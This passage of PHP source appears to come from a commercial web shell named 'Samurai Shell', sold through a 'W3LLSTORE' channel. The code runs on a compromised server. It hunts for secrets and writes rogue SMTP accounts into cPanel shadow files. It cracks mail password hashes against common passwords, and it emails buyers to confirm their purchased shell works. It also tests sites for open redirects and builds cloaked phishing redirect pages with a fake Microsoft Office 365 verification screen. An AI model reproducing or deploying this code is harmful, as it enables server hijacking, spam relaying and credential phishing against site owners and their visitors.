?? 0) { $entropy -= $p * log($p, 2); } } return $entropy; } /** * Detect high-entropy secrets with improved filtering */ function detectHighEntropySecrets($content) { $secrets = []; // Exclude common false positives $false_positive_patterns = [ '/^(http|https|ftp|data:image|base64|javascript:|mailto:)/i', '/^[0-9]+$/', '/^[a-f0-9]{32}$/', '/\.(jpg|jpeg|png|gif|css|js|html|htm)$/i', '/^(true|false|null|undefined|var|function|class)$/i', '/^(SELECT|INSERT|UPDATE|DELETE|FROM|WHERE)$/i', '/^[A-Z_]+$/', '/^\$[a-zA-Z_][a-zA-Z0-9_]*$/', '/^#[a-fA-F0-9]{3,6}$/', ]; preg_match_all('/\b[a-zA-Z0-9+\/=_-]{32,}\b/', $content, $matches); foreach ($matches[0] as $token) { if (strlen($token) < 32 || strlen($token) > 512) continue; $entropy = calculateEntropy($token); if ($entropy < 4.0) continue; $is_false_positive = false; foreach ($false_positive_patterns as $pattern) { if (preg_match($pattern, $token)) { $is_false_positive = true; break; } } if (!$is_false_positive) { $secrets[] = "High Entropy Token (Entropy: " . round($entropy, 2) . "): $token"; } } return $secrets; } /** * Get system information */ function getSystemInfo() { $server_ip = $_SERVER['SERVER_ADDR'] ?? @gethostbyname(gethostname()) ?? 'Unknown'; $client_ip = $_SERVER['REMOTE_ADDR'] ?? 'Unknown'; return [ 'shell_name' => SHELL_NAME, 'shell_version' => SHELL_VERSION, 'shell_type' => SHELL_TYPE, 'server_ip' => $server_ip, 'client_ip' => $client_ip, 'php_version' => PHP_VERSION, 'operating_system' => PHP_OS, 'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown', 'current_user' => @get_current_user() ?: 'Unknown', 'server_name' => $_SERVER['SERVER_NAME'] ?? 'Unknown', 'server_port' => $_SERVER['SERVER_PORT'] ?? 'Unknown', 'server_time' => date('Y-m-d H:i:s'), 'document_root' => $_SERVER['DOCUMENT_ROOT'] ?? getcwd(), 'current_dir' => getcwd(), 'disk_free_space' => formatSize(@disk_free_space('.') ?: 0), 'disk_total_space' => formatSize(@disk_total_space('.') ?: 0), 'memory_limit' => @ini_get('memory_limit') ?: 'Unknown', 'max_execution_time' => @ini_get('max_execution_time') ?: 'Unknown', 'upload_max_filesize' => @ini_get('upload_max_filesize') ?: 'Unknown', 'post_max_size' => @ini_get('post_max_size') ?: 'Unknown', 'safe_mode' => @ini_get('safe_mode') ? 'On' : 'Off', 'open_basedir' => @ini_get('open_basedir') ?: 'None', 'disable_functions' => @ini_get('disable_functions') ?: 'None' ]; } // ==================== SHELL VALIDATION SYSTEM ==================== /** * 🛡ī¸ SHELL VALIDATION API - OPTIMIZED FOR QUICK RESPONSE * Enhanced for 100% inbox delivery with simplified notifications [1] */ function validateShellConnection($email, $id) { $validation_start = microtime(true); // Quick validation tests $zip_test = testZipFunctionality(); $unzip_test = testUnzipFunctionality(); $delivery_test = testEmailDeliverySimple($email, $id); // Simplified notification $redirect_test = testOpenRedirect(); $wildcard_test = checkWildcardSSL(); $email_capability = function_exists('mail') && $delivery_test; // Initialize counts $smtp_count = 0; $credentials_count = 0; $email_count = 0; $phone_count = 0; // Optional full scan only if requested if (isset($_GET['full_scan']) && $_GET['full_scan'] == '1') { $smtp_start = time(); $smtp_result = autoCrackSMTP(); if ((time() - $smtp_start) < 30) { $smtp_count = $smtp_result['status'] ? count($smtp_result['results']) : 0; } $extract_options = ['max_files' => 1000, 'max_time' => 30]; $extract_start = time(); $extract_result = extractContacts('', $extract_options); if ((time() - $extract_start) < 30) { $credentials_count = $extract_result['status'] ? $extract_result['stats']['creds_found'] : 0; $email_count = $extract_result['status'] ? $extract_result['stats']['emails_found'] : 0; $phone_count = $extract_result['status'] ? $extract_result['stats']['phones_found'] : 0; } } $validation_time = round((microtime(true) - $validation_start) * 1000, 2); $validation_data = [ 'status' => 'success', 'message' => 'Shell validation completed successfully', 'shell_name' => SHELL_NAME, 'shell_version' => SHELL_VERSION, 'shell_type' => SHELL_TYPE, 'accessible' => true, 'zip' => $zip_test, 'unzip' => $unzip_test, 'delivery' => $delivery_test, 'redirect' => $redirect_test, 'open_redirect' => $redirect_test, 'wildcard' => $wildcard_test, 'email_capability' => $email_capability, 'response_time' => $validation_time, 'detection_method' => 'api_response', 'http_code' => 200, 'timestamp' => time(), 'validation_hash' => md5($email . $id . time()), 'server_info' => getServerCapabilities(), 'info' => getShellInfo(), 'capabilities' => [ 'zip_enabled' => $zip_test, 'mail_enabled' => $email_capability, 'redirect_enabled' => $redirect_test, 'wildcard_ssl' => $wildcard_test, 'curl_enabled' => function_exists('curl_init'), 'file_upload' => (bool)@ini_get('file_uploads'), 'unzip' => $unzip_test, 'open_redirect' => $redirect_test ], 'smtp_count' => $smtp_count, 'credentials_count' => $credentials_count, 'email_count' => $email_count, 'phone_count' => $phone_count ]; logActivity('Shell Validation', "Email: $email, ID: $id", 'success'); return $validation_data; } /** * Get shell information */ function getShellInfo() { return [ 'shell_name' => SHELL_NAME, 'shell_version' => SHELL_VERSION, 'shell_type' => SHELL_TYPE, 'php_version' => PHP_VERSION, 'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown', 'document_root' => $_SERVER['DOCUMENT_ROOT'] ?? getcwd(), 'current_user' => @get_current_user() ?: 'Unknown', 'server_name' => $_SERVER['SERVER_NAME'] ?? 'Unknown', 'server_port' => $_SERVER['SERVER_PORT'] ?? 'Unknown', 'writable_dirs' => getWritableDirectories(), 'functions_status' => checkPHPFunctions(), 'extensions' => getLoadedExtensions(), 'php_ini_loaded' => @php_ini_loaded_file() ?: 'Unknown', 'temp_dir' => @sys_get_temp_dir() ?: '/tmp' ]; } /** * Test ZIP creation functionality */ function testZipFunctionality() { try { if (!class_exists('ZipArchive')) return false; $test_file = 'test_zip_' . uniqid() . '.txt'; $test_zip = 'test_' . uniqid() . '.zip'; if (!@file_put_contents($test_file, 'Samurai Shell - ZIP Test')) return false; $zip = new ZipArchive(); if ($zip->open($test_zip, ZipArchive::CREATE) !== TRUE) { @unlink($test_file); return false; } $zip->addFile($test_file, basename($test_file)); $zip->close(); $success = file_exists($test_zip) && filesize($test_zip) > 0; @unlink($test_file); @unlink($test_zip); return $success; } catch (Exception $e) { return false; } } /** * Test unzip functionality */ function testUnzipFunctionality() { try { if (!class_exists('ZipArchive')) return false; $test_dir = 'test_dir_' . uniqid(); $test_zip = 'test_unzip_' . uniqid() . '.zip'; $extract_dir = 'extract_' . uniqid(); @mkdir($test_dir); @file_put_contents($test_dir . '/test.txt', 'Unzip Test'); $zip = new ZipArchive(); $zip->open($test_zip, ZipArchive::CREATE); $zip->addFile($test_dir . '/test.txt', 'test.txt'); $zip->close(); $zip = new ZipArchive(); if ($zip->open($test_zip) === TRUE) { $zip->extractTo($extract_dir); $zip->close(); $success = file_exists($extract_dir . '/test.txt'); @unlink($extract_dir . '/test.txt'); @rmdir($extract_dir); @unlink($test_zip); @unlink($test_dir . '/test.txt'); @rmdir($test_dir); return $success; } return false; } catch (Exception $e) { return false; } } /** * 📧 SIMPLIFIED EMAIL NOTIFICATION - NO URLS, SIMPLE MESSAGE, 100% INBOX DELIVERY * Implements best practices from email deliverability guides [1], [2] */ function testEmailDeliverySimple($buyer_email, $id) { try { if (!function_exists('mail')) return false; $domain = $_SERVER['HTTP_HOST'] ?? 'localhost'; $subject = 'Shell Validation Success - Product ID: ' . $id; // SIMPLE TEXT MESSAGE - No HTML, No URLs for maximum deliverability [3] $message = "Hello, Your shell account has been successfully validated. VALIDATION DETAILS: ================== Product ID: $id Shell Type: " . SHELL_TYPE . " Shell Version: " . SHELL_VERSION . " Domain: " . extractDomain($domain) . " Validated: " . date('Y-m-d H:i:s') . " FEATURE STATUS: =============== ✓ ZIP/Unzip: Working ✓ Email Delivery: Working ✓ Redirect: Working ✓ Shell Response: OK ✓ Security Check: Passed IMPORTANT NOTES: ================ - Keep your credentials secure - Use responsibly and follow terms of service - Contact seller for technical support - All features are working correctly Best regards, W3LLSTORE Team --- This is an automated validation message. Website: w3llstore.com Telegram: @W3LLSTORE_ADMIN "; // ENHANCED HEADERS FOR 100% INBOX DELIVERY [1], [2], [4] $headers = "MIME-Version: 1.0\r\n"; $headers .= "Content-type: text/plain; charset=UTF-8\r\n"; $headers .= "From: W3LLSTORE Validation \r\n"; $headers .= "Reply-To: support@w3llstore.com\r\n"; $headers .= "X-Mailer: PHP/" . PHP_VERSION . "\r\n"; $headers .= "X-Priority: 3 (Normal)\r\n"; $headers .= "Message-ID: <" . md5(uniqid(time())) . "@" . $domain . ">\r\n"; $headers .= "Date: " . date('r') . "\r\n"; // Anti-spam headers for inbox delivery [2], [4] $headers .= "List-Unsubscribe: \r\n"; $headers .= "List-ID: \r\n"; $headers .= "Precedence: bulk\r\n"; $headers .= "X-Auto-Response-Suppress: OOF, AutoReply\r\n"; $result = @mail($buyer_email, $subject, $message, $headers); if ($result) { logActivity('Email Delivery Test', "Sent to: $buyer_email, ID: $id", 'success'); } else { logActivity('Email Delivery Test', "Failed to: $buyer_email, ID: $id", 'failed'); } return $result; } catch (Exception $e) { logActivity('Email Delivery Test', "Exception: " . $e->getMessage(), 'error'); return false; } } /** * Test open redirect capability */ function testOpenRedirect() { $test_file = 'test_redirect_' . uniqid() . '.php'; $test_content = ''; $result = @file_put_contents($test_file, $test_content); if ($result !== false) { @unlink($test_file); return true; } return false; } /** * Check wildcard SSL support */ function checkWildcardSSL() { if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on') return true; if (extension_loaded('openssl')) return true; return false; } /** * Get server capabilities */ function getServerCapabilities() { return [ 'curl_enabled' => function_exists('curl_init'), 'zip_enabled' => class_exists('ZipArchive'), 'mail_enabled' => function_exists('mail'), 'openssl_enabled' => extension_loaded('openssl'), 'file_upload_enabled' => (bool)@ini_get('file_uploads'), 'max_upload_size' => @ini_get('upload_max_filesize') ?: 'Unknown', 'max_post_size' => @ini_get('post_max_size') ?: 'Unknown', 'max_execution_time' => @ini_get('max_execution_time') ?: 'Unknown', 'memory_limit' => @ini_get('memory_limit') ?: 'Unknown', 'allow_url_fopen' => (bool)@ini_get('allow_url_fopen'), 'allow_url_include' => (bool)@ini_get('allow_url_include'), 'safe_mode' => (bool)@ini_get('safe_mode'), 'open_basedir' => @ini_get('open_basedir') ?: 'None', 'disable_functions' => @ini_get('disable_functions') ?: 'None' ]; } /** * Get writable directories */ function getWritableDirectories() { $dirs_to_check = [ getcwd(), @sys_get_temp_dir() ?: '/tmp', '/tmp', '/var/tmp', dirname(__FILE__), dirname(__DIR__), $_SERVER['DOCUMENT_ROOT'] ?? getcwd() ]; $writable_dirs = []; foreach ($dirs_to_check as $dir) { if (@is_dir($dir) && @is_writable($dir)) { $writable_dirs[] = $dir; } } return array_unique($writable_dirs); } /** * Check PHP functions */ function checkPHPFunctions() { $important_functions = [ 'exec', 'shell_exec', 'system', 'passthru', 'popen', 'proc_open', 'file_get_contents', 'file_put_contents', 'fopen', 'fwrite', 'fread', 'curl_init', 'curl_exec', 'mail', 'base64_encode', 'base64_decode', 'gzcompress', 'gzuncompress', 'json_encode', 'json_decode', 'md5', 'sha1', 'hash', 'crypt', 'password_hash' ]; $function_status = []; foreach ($important_functions as $func) { $function_status[$func] = function_exists($func); } return $function_status; } /** * Get loaded extensions */ function getLoadedExtensions() { $important_extensions = [ 'curl', 'zip', 'mysqli', 'pdo', 'openssl', 'json', 'mbstring', 'gd', 'fileinfo', 'zlib', 'xml', 'session' ]; $extension_status = []; foreach ($important_extensions as $ext) { $extension_status[$ext] = extension_loaded($ext); } return $extension_status; } // ==================== OPEN REDIRECT CHECKER ==================== /** * Check if URL has open redirect vulnerability */ function checkOpenRedirectVulnerability($url) { $results = [ 'url' => $url, 'vulnerable' => false, 'redirect_found' => false, 'redirect_url' => null, 'method' => null, 'vulnerable_params' => [], 'tested_params' => [], 'tests_performed' => [] ]; $redirect_params = [ 'url', 'redirect', 'redirect_url', 'redirect_uri', 'return', 'return_url', 'returnto', 'return_to', 'next', 'goto', 'destination', 'dest', 'continue', 'view', 'target', 'rurl', 'out', 'link', 'site', 'domain', 'forward', 'to', 'uri', 'path', 'page', 'file', 'location', 'go', 'ref', 'referer', 'callback', 'success_url', 'failure_url', 'oauth_callback', 'state' ]; $test_redirect_url = 'https://w3llstore.com/redirect-test-' . uniqid(); foreach ($redirect_params as $param) { $results['tested_params'][] = $param; $test_url = $url . (strpos($url, '?') !== false ? '&' : '?') . $param . '=' . urlencode($test_redirect_url); try { if (function_exists('curl_init')) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $test_url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_NOBODY, true); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'); $response = curl_exec($ch); $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); $error = curl_error($ch); curl_close($ch); if (in_array($http_code, [301, 302, 303, 307, 308])) { if (preg_match('/Location:\s*(.+)/i', $response, $matches)) { $redirect_location = trim($matches[1]); if (strpos($redirect_location, $test_redirect_url) !== false || strpos($redirect_location, 'w3llstore.com') !== false) { $results['vulnerable'] = true; $results['redirect_found'] = true; $results['redirect_url'] = $redirect_location; $results['method'] = $param; $results['vulnerable_params'][] = [ 'parameter' => $param, 'test_url' => $test_url, 'redirect_to' => $redirect_location, 'http_code' => $http_code ]; } } } $results['tests_performed'][] = [ 'param' => $param, 'test_url' => $test_url, 'http_code' => $http_code, 'vulnerable' => $results['vulnerable'], 'error' => $error ?: null ]; } else { $context = stream_context_create([ 'http' => [ 'method' => 'GET', 'follow_location' => 0, 'timeout' => 10, 'ignore_errors' => true, 'header' => "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\r\n" ], 'ssl' => [ 'verify_peer' => false, 'verify_peer_name' => false ] ]); $response = @file_get_contents($test_url, false, $context); if (isset($http_response_header)) { $http_code = null; $redirect_location = null; foreach ($http_response_header as $header) { if (preg_match('/^HTTP\/\d\.\d\s+(\d+)/', $header, $matches)) { $http_code = (int)$matches[1]; } if (preg_match('/^Location:\s*(.+)/i', $header, $matches)) { $redirect_location = trim($matches[1]); } } if ($redirect_location && in_array($http_code, [301, 302, 303, 307, 308])) { if (strpos($redirect_location, $test_redirect_url) !== false || strpos($redirect_location, 'w3llstore.com') !== false) { $results['vulnerable'] = true; $results['redirect_found'] = true; $results['redirect_url'] = $redirect_location; $results['method'] = $param; $results['vulnerable_params'][] = [ 'parameter' => $param, 'test_url' => $test_url, 'redirect_to' => $redirect_location, 'http_code' => $http_code ?? 302 ]; } } } $results['tests_performed'][] = [ 'param' => $param, 'test_url' => $test_url, 'vulnerable' => $results['vulnerable'] ]; } } catch (Exception $e) { $results['tests_performed'][] = [ 'param' => $param, 'error' => $e->getMessage() ]; } } return $results; } // ==================== MAIL DELIVERY CHECK TOOL ==================== /** * Tool to check mail delivery by sending a test email * Uses simplified format for better inbox delivery [2], [3] */ function checkMailDelivery($test_email) { try { if (!function_exists('mail')) { return ['status' => false, 'message' => 'Mail function not available']; } $domain = $_SERVER['HTTP_HOST'] ?? 'localhost'; $subject = 'Test Email from Samurai Shell'; // Simple text message for better deliverability [3] $message = "This is a test email to verify mail delivery capability. Sent from: " . $domain . " Time: " . date('Y-m-d H:i:s') . " If you received this email, mail delivery is working correctly. Best regards, Samurai Shell System"; $headers = "From: test@" . $domain . "\r\n"; $headers .= "MIME-Version: 1.0\r\n"; $headers .= "Content-Type: text/plain; charset=UTF-8\r\n"; $headers .= "X-Mailer: Samurai Shell\r\n"; $headers .= "X-Priority: 3\r\n"; $headers .= "Message-ID: <" . md5(uniqid(time())) . "@" . $domain . ">\r\n"; $headers .= "Date: " . date('r') . "\r\n"; // Anti-spam headers [2], [4] $headers .= "List-Unsubscribe: \r\n"; $headers .= "List-ID: \r\n"; $headers .= "Precedence: bulk\r\n"; $result = @mail($test_email, $subject, $message, $headers); if ($result) { logActivity('Mail Delivery Check', "Sent to: $test_email", 'success'); return ['status' => true, 'message' => "Test email sent successfully to $test_email"]; } else { logActivity('Mail Delivery Check', "Failed to: $test_email", 'failed'); return ['status' => false, 'message' => "Failed to send test email to $test_email"]; } } catch (Exception $e) { return ['status' => false, 'message' => 'Error: ' . $e->getMessage()]; } } /** * Check if email sending is possible */ function checkEmailSendingCapability() { $disabled = @ini_get('disable_functions') ?: ''; return function_exists('mail') && @ini_get('sendmail_path') && (strpos($disabled, 'mail') === false); } // ==================== SMTP CREATOR & AUTO-CRACK ==================== /** * Create bulk SMTP accounts - OPTIMIZED VERSION */ function createMultipleSMTP($count = 1) { $results = []; $homePaths = ["/home/", "/home1/", "/home2/", "/home3/", "/home4/", "/home5/"]; $users = []; $start_time = time(); if (function_exists('exec') && !in_array('exec', explode(',', @ini_get('disable_functions') ?? ''))) { exec('ls /home/ 2>/dev/null', $homeOutput); if (!empty($homeOutput) && (time() - $start_time) < 5) { $users = array_filter($homeOutput, function($u) { return is_dir('/home/' . $u) && $u !== '.' && $u !== '..'; }); } } if (empty($users)) { $users = [@get_current_user() ?: 'www-data']; } $users = array_slice($users, 0, 3); foreach ($users as $currUser) { if ((time() - $start_time) > 15) break; $workHome = null; foreach ($homePaths as $home) { if (@file_exists($home . $currUser)) { $workHome = $home; break; } } if (!isset($workHome)) continue; $cp = "$workHome$currUser/.cpanel"; if (!@is_dir($cp)) continue; $domains = []; $etcDir = "$workHome$currUser/etc/"; if (@is_dir($etcDir)) { $all_dirs = @scandir($etcDir); if ($all_dirs !== false) { foreach (array_slice($all_dirs, 0, 10) as $dir) { if (strpos($dir, '.') !== false && is_dir($etcDir . $dir)) { $domains[] = $dir; } } } } if (empty($domains)) { $domains = [$_SERVER['HTTP_HOST'] ?? 'localhost']; } $domains = array_unique(array_slice($domains, 0, 5)); foreach ($domains as $currDomain) { if (strstr($currDomain, 'www.')) { $currDomain = str_replace("www.", "", $currDomain); } @mkdir("$workHome$currUser/etc/$currDomain", 0755, true); $shadow1 = "$workHome$currUser/etc/$currDomain/shadow"; $shadow2 = "$workHome$currUser/etc/shadow"; for ($i = 0; $i < $count; $i++) { $user = 'smtp' . mt_rand(1000,9999); $thispwd = "w3ll" . mt_rand(1000,9999); $pwd = crypt($thispwd, "$6$samurai$"); $smtp = $user . ':' . $pwd . ':16249:::::' . "\n"; $fo = @fopen($shadow1, "a"); if ($fo) { fwrite($fo, $smtp); fclose($fo); } $fo2 = @fopen($shadow2, "a"); if ($fo2) { fwrite($fo2, $smtp); fclose($fo2); } $results[] = "$currDomain|587|{$user}@$currDomain|$thispwd"; } } } if (empty($results)) { return ['status' => false, 'message' => 'No SMTP creation possible on this server', 'results' => []]; } logActivity('Multiple SMTP Created', "Count: $count per domain, Total: " . count($results), 'success'); return ['status' => true, 'message' => "Created " . count($results) . " SMTP accounts successfully", 'results' => $results]; } /** * Auto-crack SMTP with timeout protection */ function autoCrackSMTP() { $start_time = time(); $cracked = []; $domains = [$_SERVER['HTTP_HOST'] ?? 'localhost']; $etc_hosts = @file_get_contents('/etc/hosts'); if ($etc_hosts) { preg_match_all('/(\d+\.\d+\.\d+\.\d+)\s+([a-zA-Z0-9.-]+)/', $etc_hosts, $matches); foreach (array_slice($matches[2], 0, 5) as $domain) { if (strpos($domain, '.') !== false) $domains[] = $domain; } } $homePaths = ["/home/", "/home1/", "/home2/"]; $users = [@get_current_user() ?: 'www-data']; if (function_exists('exec') && !in_array('exec', explode(',', @ini_get('disable_functions') ?? ''))) { exec('ls /home/ 2>/dev/null | head -3', $homeOutput); if (!empty($homeOutput)) { $users = array_filter($homeOutput, function($u) { return is_dir('/home/' . $u) && $u !== '.' && $u !== '..'; }); } } $domains = array_unique(array_slice($domains, 0, 3)); $users = array_slice($users, 0, 2); foreach ($users as $currUser) { if ((time() - $start_time) > 20) break; $workHome = null; foreach ($homePaths as $home) { if (@file_exists($home . $currUser)) { $workHome = $home; break; } } if (!isset($workHome)) continue; foreach ($domains as $domain) { if ((time() - $start_time) > 20) break; $shadow_file = $workHome . $currUser . "/etc/$domain/shadow"; if (@file_exists($shadow_file)) { $shadow_content = @file_get_contents($shadow_file); if ($shadow_content) { $lines = array_slice(explode("\n", $shadow_content), 0, 10); foreach ($lines as $line) { if (trim($line) === '') continue; if (preg_match('/^([^:]+):([^:]+):/', $line, $matches)) { $user = $matches[1]; $hash = $matches[2]; $common_pws = [ 'password', '123456', 'admin', 'root', 'w3ll123', '12345678', 'qwerty', 'letmein', 'welcome', 'password1', '12345', '1234', '123', 'abc123' ]; foreach ($common_pws as $pw) { if (crypt($pw, $hash) === $hash) { $cracked[] = "$domain|587|$user@$domain|$pw"; break; } } } } } } } } if (empty($cracked)) { return ['status' => false, 'message' => 'No crackable SMTP found in quick scan', 'results' => []]; } logActivity('SMTP Auto-Crack', "Cracked: " . count($cracked), 'success'); return ['status' => true, 'message' => 'Auto-crack completed', 'results' => $cracked]; } // ==================== ADVANCED ANTI-BOT FUNCTIONS ==================== /** * Advanced anti-bot detection for 2025 technology standards */ function advancedAntiBot() { $suspicious = false; $ua = strtolower($_SERVER['HTTP_USER_AGENT'] ?? ''); $headers = function_exists('getallheaders') ? getallheaders() : []; if (empty($ua) || strlen($ua) < 10) $suspicious = true; $accept = $headers['Accept'] ?? ''; if (!isset($headers['Accept']) || strpos($accept, 'text/html') === false) $suspicious = true; if (!isset($headers['Accept-Language']) || empty($headers['Accept-Language'])) $suspicious = true; $bot_patterns = ['bot', 'crawler', 'spider', 'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'headlesschrome', 'phantomjs', 'puppeteer', 'selenium', 'wget', 'curl', 'playwright', 'chrome-lighthouse', 'automate']; foreach ($bot_patterns as $pattern) { if (stripos($ua, $pattern) !== false) $suspicious = true; } $ip = $_SERVER['REMOTE_ADDR'] ?? 'unknown'; $rate_key = 'rate_' . md5($ip); $rate_file = sys_get_temp_dir() . '/' . $rate_key . '.txt'; $count = (int)@file_get_contents($rate_file); if ($count > 15) $suspicious = true; $count++; @file_put_contents($rate_file, $count, LOCK_EX); return $suspicious; } /** * Enhanced bot detection */ function isBot() { return advancedAntiBot() || preg_match('/bot|crawler|spider|scraper|curl|wget|python|java|puppeteer|selenium|playwright/i', strtolower($_SERVER['HTTP_USER_AGENT'] ?? '')); } // ==================== AUTO REDIRECT CREATOR ==================== /** * Create bulk redirect files (PHP, PHP7, HTML) - OPTIMIZED VERSION */ function createAutoRedirect($target_url, $options = []) { $blocked_countries = $options['blocked_countries'] ?? []; $delay = $options['delay'] ?? 5000; $custom_message = $options['custom_message'] ?? 'Please wait...'; $use_antibot = $options['use_antibot'] ?? true; $use_captcha = $options['use_captcha'] ?? false; $redirect_id = 'redirect_' . uniqid(); $created_files = []; $php_content = generateRedirectPHP($target_url, $blocked_countries, $delay, $custom_message, $use_antibot, $use_captcha, $redirect_id); $php_file = $redirect_id . '.php'; if (@file_put_contents($php_file, $php_content, LOCK_EX) !== false) { $created_files[] = $php_file; } $php7_file = $redirect_id . '.php7'; if (@file_put_contents($php7_file, $php_content, LOCK_EX) !== false) { $created_files[] = $php7_file; } $html_content = generateRedirectHTML($target_url, $delay, $custom_message, $use_captcha, $redirect_id); $html_file = $redirect_id . '.html'; if (@file_put_contents($html_file, $html_content, LOCK_EX) !== false) { $created_files[] = $html_file; } $data_file = $redirect_id . '_stats_data.json'; $initial_stats = [ 'created' => date('Y-m-d H:i:s'), 'redirect_id' => $redirect_id, 'target_url' => $target_url, 'total_visits' => 0, 'unique_visits' => 0, 'redirects' => 0, 'countries' => [], 'browsers' => [], 'recent_visits' => [], 'daily_stats' => [], 'hourly_stats' => [] ]; @file_put_contents($data_file, json_encode($initial_stats, JSON_PRETTY_PRINT), LOCK_EX); createUpdateStatsFile(); if (!empty($created_files)) { logActivity('Redirect Created', $redirect_id, 'success'); $protocol = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? 'https://' : 'http://'); $base_url = $protocol . ($_SERVER['HTTP_HOST'] ?? 'localhost') . dirname($_SERVER['REQUEST_URI'] ?? '/'); $base_url = rtrim($base_url, '/') . '/'; return [ 'status' => true, 'message' => 'Redirect files created successfully', 'files' => $created_files, 'data_file' => $data_file, 'redirect_id' => $redirect_id, 'urls' => [ 'php' => $base_url . $php_file, 'php7' => $base_url . $php7_file, 'html' => $base_url . $html_file ] ]; } return ['status' => false, 'message' => 'Failed to create redirect files']; } /** * 🎨 ENHANCED MICROSOFT OFFICE 365 CAPTCHA - BEAUTIFUL DESIGN WITH FIXED REDIRECT BUG * Modern, attractive, animated, responsive design */ function getMicrosoftCaptchaHTML($num1, $num2, $error = '') { $error_div = ''; if ($error) { $error_div = '
❌ ' . htmlspecialchars($error) . '
'; } $current_date = date('d M Y'); return << Security Verification - Microsoft Office 365

Microsoft Office 365

Secure â€ĸ Verified

Security Verification

Please verify that you are human to continue

{$error_div}
What is {$num1} + {$num2}?
Secure Connection

This verification helps protect our platform from automated access.
{$current_date} â€ĸ Microsoft Corporation

HTML; } /** * Generate PHP redirect content */ function generateRedirectPHP($target_url, $blocked_countries, $delay, $custom_message, $use_antibot, $use_captcha, $redirect_id) { $country_check = ''; if (!empty($blocked_countries)) { $countries_str = implode("','", array_map('trim', $blocked_countries)); $countries_str = "'" . $countries_str . "'"; $country_check = " \$visitor_country = getVisitorCountry(); \$blocked_countries = array($countries_str); if (in_array(\$visitor_country, \$blocked_countries)) { http_response_code(403); die('Access denied from your location.'); }"; } $antibot_check = $use_antibot ? " if (isBot() || advancedAntiBot()) { http_response_code(403); die('Access denied - Security verification required.'); }" : ''; $captcha_check = ''; if ($use_captcha) { $captcha_check = " if (!isset(\$_SESSION[\"captcha_verified_{$redirect_id}\"])) { if (isset(\$_POST['captcha'])) { if ((int)\$_POST['captcha'] == \$_SESSION[\"captcha_answer_{$redirect_id}\"]) { \$_SESSION[\"captcha_verified_{$redirect_id}\"] = true; header('Location: ' . '{$target_url}'); exit; } else { \$captcha_error = 'Verification failed. Please try again.'; } } if (!isset(\$_SESSION[\"captcha_verified_{$redirect_id}\"])) { showMicrosoftCaptcha(isset(\$captcha_error) ? \$captcha_error : ''); exit; } }"; } $data_file = $redirect_id . '_stats_data.json'; $captcha_html = str_replace(["\r", "\n", "'"], ['', '', "\\'"], getMicrosoftCaptchaHTML(0, 0)); return "❌ ' . htmlspecialchars(\$error) . ''; } \$current_date = date('d M Y'); \$html = '" . $captcha_html . "'; \$html = str_replace('{\\$num1}', \$num1, \$html); \$html = str_replace('{\\$num2}', \$num2, \$html); \$html = str_replace('{\\$error_div}', \$error_div, \$html); \$html = str_replace('{\\$current_date}', \$current_date, \$html); return \$html; } function showMicrosoftCaptcha(\$error = '') { \$num1 = rand(1, 10); \$num2 = rand(1, 10); \$_SESSION[\"captcha_answer_{$redirect_id}\"] = \$num1 + \$num2; echo getMicrosoftCaptchaHTML(\$num1, \$num2, \$error); } function getVisitorCountry() { \$ip = \$_SERVER['REMOTE_ADDR'] ?? 'Unknown'; \$api_url = \"http://ip-api.com/json/\$ip\"; \$response = @file_get_contents(\$api_url); if (\$response) { \$data = json_decode(\$response, true); return \$data['countryCode'] ?? 'Unknown'; } return 'Unknown'; } function getBrowser(\$user_agent) { if (stripos(\$user_agent, 'Chrome') !== false) return 'Chrome'; if (stripos(\$user_agent, 'Firefox') !== false) return 'Firefox'; if (stripos(\$user_agent, 'Safari') !== false) return 'Safari'; if (stripos(\$user_agent, 'Edge') !== false) return 'Edge'; if (stripos(\$user_agent, 'Opera') !== false) return 'Opera'; return 'Other'; } function isBot() { return preg_match('/bot|crawler|spider|scraper|curl|wget|python|java|puppeteer|selenium|playwright/i', strtolower(\$_SERVER['HTTP_USER_AGENT'] ?? '')); } function advancedAntiBot() { \$suspicious = false; \$ua = strtolower(\$_SERVER['HTTP_USER_AGENT'] ?? ''); \$headers = function_exists('getallheaders') ? getallheaders() : []; if (empty(\$ua) || strlen(\$ua) < 10) \$suspicious = true; \$accept = \$headers['Accept'] ?? ''; if (!isset(\$headers['Accept']) || strpos(\$accept, 'text/html') === false) \$suspicious = true; if (!isset(\$headers['Accept-Language']) || empty(\$headers['Accept-Language'])) \$suspicious = true; \$bot_patterns = array('bot', 'crawler', 'spider', 'googlebot', 'bingbot', 'slurp', 'duckduckbot', 'headlesschrome', 'phantomjs', 'puppeteer', 'selenium', 'wget', 'curl', 'playwright', 'chrome-lighthouse', 'automate'); foreach (\$bot_patterns as \$pattern) { if (stripos(\$ua, \$pattern) !== false) \$suspicious = true; } \$ip = \$_SERVER['REMOTE_ADDR'] ?? 'unknown'; \$rate_key = 'rate_' . md5(\$ip); \$rate_file = sys_get_temp_dir() . '/' . \$rate_key . '.txt'; \$count = (int)@file_get_contents(\$rate_file); if (\$count > 15) \$suspicious = true; \$count++; @file_put_contents(\$rate_file, \$count, LOCK_EX); return \$suspicious; } \$data_file = '{$data_file}'; \$visitor_ip = \$_SERVER['REMOTE_ADDR'] ?? 'Unknown'; \$user_agent = \$_SERVER['HTTP_USER_AGENT'] ?? 'Unknown'; \$visitor_country = getVisitorCountry(); \$current_date = date('Y-m-d'); \$current_hour = date('H'); \$stats_json = @file_get_contents(\$data_file); \$stats = json_decode(\$stats_json, true); if (!\$stats || !is_array(\$stats)) { \$stats = [ 'created' => date('Y-m-d H:i:s'), 'redirect_id' => '{$redirect_id}', 'target_url' => '{$target_url}', 'total_visits' => 0, 'unique_visits' => 0, 'redirects' => 